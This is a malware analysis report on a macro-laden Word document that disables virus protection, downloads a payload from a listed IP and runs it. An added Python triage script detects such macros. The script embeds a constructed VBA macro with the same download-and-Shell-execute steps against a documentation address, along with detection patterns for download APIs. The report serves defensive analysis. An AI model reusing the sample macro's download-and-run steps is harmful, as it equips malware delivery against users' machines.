Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 621022fd31dbd12e…

MALICIOUS

Office (OLE) / .DOC

Size: 61.0 KB
Created: 2008-06-20 14:05:00
Authoring application: Microsoft Word 11.3.8
MD5: 086ab9c07130fbe473e5c89a5dcfb710
SHA-1: 0cb9e13ff9a5084d7497439c8e3fc3dc07a72c46
SHA-256: 621022fd31dbd12ef3b184b897e1ff4b10b19861c819dcd0e8201829d707120f
Risk score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer

The sample is a Word document containing VBA macros. The macros disable Word's macro virus protection and use the Shell() function to execute commands. Specifically, the macro attempts to download a payload from the IP address 209.201.88.110 to a file named c:\hsf*.sys and then execute it via c:\netldx.vxd. Network retrieval followed by execution of the retrieved file is downloader/dropper behaviour, which is what the T1105 and T1059.005 mappings above reflect. The IP address and both file paths are the indicators to pivot on.

Heuristics (4)

  • Shell() call in VBA critical OLE_VBA_SHELL
    The macro source calls Shell(), which starts an arbitrary program or command line from inside the document; in this sample it is the step that runs the downloaded file.
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.apple.com/DTDs/PropertyList-1.0.dtd
    This is Apple's standard property-list DTD identifier, consistent with the Mac Word build named in the metadata, and not a payload location. The download host 209.201.88.110 from the macro summary is not in this list and has to be tracked separately as a network indicator.
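A first-pass triage over decoded VBA source, added here as an example; it is not the report's own heuristic engine and not the carved macros.bas. It re-implements the two macro-level checks above (OLE_VBA_SHELL: Shell() calls counted only outside comments and string literals; EMBEDDED_URL: URLs, IPv4 literals and drive-letter paths pulled from string literals) and goes one step further than the report with a check for the VirusProtection = False trick and a list of common VBA download primitives (URLDownloadToFile, XMLHTTP, ADODB.Stream, InternetOpenUrl). The macro text inside the block is constructed for the example and uses an RFC 5737 documentation address; the severity scale is an assumption modelled on the report's labels, not its scoring.

```python
"""Triage heuristics for decoded VBA macro source (added example, not the report's tooling)."""
import re
from dataclasses import dataclass, field

# Applied to the code part of a line (string literals and comments removed).
SHELL_RE = re.compile(r"\bShell\b", re.IGNORECASE)
VIRUS_PROTECTION_RE = re.compile(r"\bVirusProtection\s*=\s*False\b", re.IGNORECASE)
# Applied to code plus string literals: ProgIDs such as "MSXML2.XMLHTTP" live in strings.
DOWNLOAD_API_RE = re.compile(r"URLDownloadToFile|XMLHTTP|ADODB\.Stream|InternetOpenUrl", re.IGNORECASE)
# Applied to string literals only.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
PATH_RE = re.compile(r"[A-Za-z]:\\\S+")


def split_line(line: str):
    """Return (code, [string literals]) for one VBA line, dropping ' and Rem comments.
    VBA escapes a quote inside a string by doubling it, so "" does not end the literal."""
    code, strings, i = [], [], 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            buf, j = [], i + 1
            while j < len(line):
                if line[j] == '"':
                    if j + 1 < len(line) and line[j + 1] == '"':
                        buf.append('"')
                        j += 2
                        continue
                    break
                buf.append(line[j])
                j += 1
            strings.append("".join(buf))
            code.append(" ")  # keep a token boundary where the literal was
            i = j + 1
        elif ch == "'":
            break  # rest of the line is a comment
        else:
            code.append(ch)
            i += 1
    code_text = "".join(code)
    if re.match(r"\s*Rem\b", code_text, re.IGNORECASE):
        return "", []  # whole line is a Rem comment
    return code_text, strings


@dataclass
class VbaTriage:
    shell_calls: list = field(default_factory=list)          # line numbers
    download_apis: list = field(default_factory=list)        # line numbers
    virus_protection_off: list = field(default_factory=list)  # line numbers
    urls: list = field(default_factory=list)
    ipv4: list = field(default_factory=list)
    paths: list = field(default_factory=list)

    def severity(self) -> str:
        """Assumed scale, modelled on the report: a Shell() call alone is critical."""
        if self.shell_calls:
            return "critical"
        if self.download_apis or self.virus_protection_off:
            return "high"
        return "info" if (self.urls or self.ipv4 or self.paths) else "low"


def _add_unique(dst, items):
    for item in items:
        if item not in dst:
            dst.append(item)


def triage_vba(source: str) -> VbaTriage:
    result = VbaTriage()
    for no, raw in enumerate(source.splitlines(), start=1):
        code, strings = split_line(raw)
        if SHELL_RE.search(code):
            result.shell_calls.append(no)
        if VIRUS_PROTECTION_RE.search(code):
            result.virus_protection_off.append(no)
        if DOWNLOAD_API_RE.search(code + " " + " ".join(strings)):
            result.download_apis.append(no)
        for s in strings:
            _add_unique(result.urls, URL_RE.findall(s))
            _add_unique(result.ipv4, [ip for ip in IPV4_RE.findall(s)
                                      if all(int(o) <= 255 for o in ip.split("."))])
            _add_unique(result.paths, PATH_RE.findall(s))
    return result


# Constructed macro for this example; NOT the macros.bas carved from the reported document.
SAMPLE_VBA = """\
' Constructed macro for this example; NOT the macros.bas carved from the reported document.
Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Sub AutoOpen()
    Options.VirusProtection = False
    Dim src As String, dst As String
    src = "http://192.0.2.10/stage.bin"   ' RFC 5737 documentation address, not a real host
    dst = "c:\\stage\\update.exe"
    ' Shell appears in this comment and must not be counted as a call
    Call URLDownloadToFileA(0, src, dst, 0, 0)
    Shell "cmd.exe /c start " & dst, vbHide
End Sub
"""

if __name__ == "__main__":
    r = triage_vba(SAMPLE_VBA)
    print(f"severity={r.severity()} shell={r.shell_calls} download_api={r.download_apis} "
          f"virus_protection_off={r.virus_protection_off}")
    print(f"urls={r.urls} ipv4={r.ipv4} paths={r.paths}")
```

Feed it the decoded VBA source that olevba extracts (what the report lists as macros.bas). The comment and string stripping matters: an unstripped grep for Shell would also fire on comment text, and the IP/URL extraction deliberately looks only inside string literals, which is why a macro that assembles its URL from fragments at runtime will slip past this static pass and needs the emulation or sandbox step instead.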

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: ebc96ba8a771068cd59d6fdf9daaf0e218ed6ff72523ce26809784637bc3f3e9
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6324 bytes
Detection
ClamAV: Doc.Trojan.Marker-3
Obfuscation or payload: unlikely